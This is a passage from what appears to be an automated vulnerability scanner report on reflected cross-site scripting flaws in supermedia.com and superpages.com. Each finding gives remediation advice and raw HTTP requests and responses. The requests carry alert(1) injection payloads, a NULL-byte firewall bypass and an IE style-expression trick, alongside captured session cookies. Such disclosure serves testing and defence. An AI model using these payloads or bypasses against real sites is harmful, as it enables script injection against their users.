Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Topb7d7a"%3balert(1)//5f4e0e8915 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 17:05:45 GMT
Set-Cookie: JSESSIONID=63B1953F08BCF0514CDCD4855AE3E1E8.app7-a1; Path=/
Set-Cookie: trafficSource=SP; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Your Business Profile | SuperMedia.com Advertising</title>



...[SNIP]...
4="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="BP:Update Your Profile Topb7d7a";alert(1)//5f4e0e8915";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

1.507. http://www.supermedia.com/business-listings/business-profile [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/business-profile

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00647f4"%3balert(1)//acd0e29ec22 was submitted in the campaignId parameter. This input was echoed as 647f4";alert(1)//acd0e29ec22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Top%00647f4"%3balert(1)//acd0e29ec22 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:48 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Your Business Profile | SuperMedia.com Advertising</title>



...[SNIP]...
="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="BP:Update Your Profile Top.647f4";alert(1)//acd0e29ec22";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

1.508. http://www.supermedia.com/online-advertising [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /online-advertising

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f17b"%3balert(1)//351308f1023 was submitted in the campaignId parameter. This input was echoed as 6f17b";alert(1)//351308f1023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online-advertising?tsrc=SP&campaignId=SP_FT_AdvertiseWithUs6f17b"%3balert(1)//351308f1023 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...
prop24="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="SP_FT_AdvertiseWithUs6f17b";alert(1)//351308f1023";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

1.509. http://www.supermedia.com/online-advertising [tsrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /online-advertising

Issue detail

The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9e22"%3balert(1)//51aaefb74c6 was submitted in the tsrc parameter. This input was echoed as b9e22";alert(1)//51aaefb74c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online-advertising?tsrc=SPb9e22"%3balert(1)//51aaefb74c6&campaingnId=SP_listing_header HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:13 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...
"";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="";
s.products="";
s.eVar1="";
s.eVar2="SPb9e22";alert(1)//51aaefb74c6";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15="";
s.eVar16="";
s.eVar17="";
s.eVar18="
...[SNIP]...

1.510. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2fa"><script>alert(1)</script>887ac555049 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ab2fa"><script>alert(1)</script>887ac555049=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:12 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:14 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link media="screen, projection" type="text/css" HREF="http://www.superpages.com/css/header.css?SRC=&ab2fa"><script>alert(1)</script>887ac555049=1" rel="stylesheet" />
...[SNIP]...

1.511. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b3044--><script>alert(1)</script>9a336ccd25a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?b3044--><script>alert(1)</script>9a336ccd25a=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:20 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:20 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a href="?SRC=&b3044--><script>alert(1)</script>9a336ccd25a=1#" rel="nofollow">
...[SNIP]...

1.512. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c040f'-alert(1)-'b2565b0ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c040f'-alert(1)-'b2565b0ba7=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:16 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:16 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&c040f'-alert(1)-'b2565b0ba7=1" rel="nofollow">
...[SNIP]...

1.513. http://www.superpages.com/bp/Facebook [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/Facebook

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce45f"-alert(1)-"161ba1e0a00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/Facebookce45f"-alert(1)-"161ba1e0a00 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=F81968BB9B8C6E79A245B67095187467; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 57268
Date: Thu, 03 Feb 2011 17:06:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
ellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/bp/Facebookce45f"-alert(1)-"161ba1e0a00?=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.514. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [PGID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the PGID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e44e9"-alert(1)-"ac1eec3d3bf was submitted in the PGID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750566133-www.superpages.com-18392944-855020; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:29:26 GMT; Path=/
Set-Cookie: JSESSIONID=15DD6E10C9F988449C56134A74598F9A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:29:25 GMT
Content-Length: 66686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
ype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

1.515. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f735"-alert(1)-"5e13c75896f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750717878-www.superpages.com-25570824-638833; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:57 GMT; Path=/
Set-Cookie: JSESSIONID=5C32A1099510A145A292891057754A90; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:57 GMT
Content-Length: 66498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
tp://yellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'ht
...[SNIP]...

1.516. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7a3"-alert(1)-"d9426b3b370 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750760787-www.superpages.com-11101702-780397; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:32:40 GMT; Path=/
Set-Cookie: JSESSIONID=82629E94B8FADDDBFF9B5C6A1B6BECC4; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:40 GMT
Content-Length: 18489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
gescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.517. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the SRC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02 was submitted in the SRC parameter. This input was echoed as 8c3a4"style="x:expression(alert(1))"d28cbb2cb02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750439498-www.superpages.com-4789827-628076; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:19 GMT; Path=/
Set-Cookie: JSESSIONID=8C15D1E521D5C7BAD68D0A53F9577955; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:27:18 GMT
Content-Length: 128435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a href="http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toBusinesses&SRC=comlocal1a8c3a4"style="x:expression(alert(1))"d28cbb2cb02" rel="nofollow" onClick="clickTrackTabs('GT','MySuperpages', 'yp_profile');">
...[SNIP]...

1.518. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ebe9"%3balert(1)//fc3f4c0a516 was submitted in the SRC parameter. This input was echoed as 3ebe9";alert(1)//fc3f4c0a516 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a3ebe9"%3balert(1)//fc3f4c0a516&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750452826-www.superpages.com-16809597-702534; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:32 GMT; Path=/
Set-Cookie: JSESSIONID=4CDE972A6F7062265EBD4234C3250381; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:27:33 GMT
Content-Length: 126537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
ww.superpages.com";
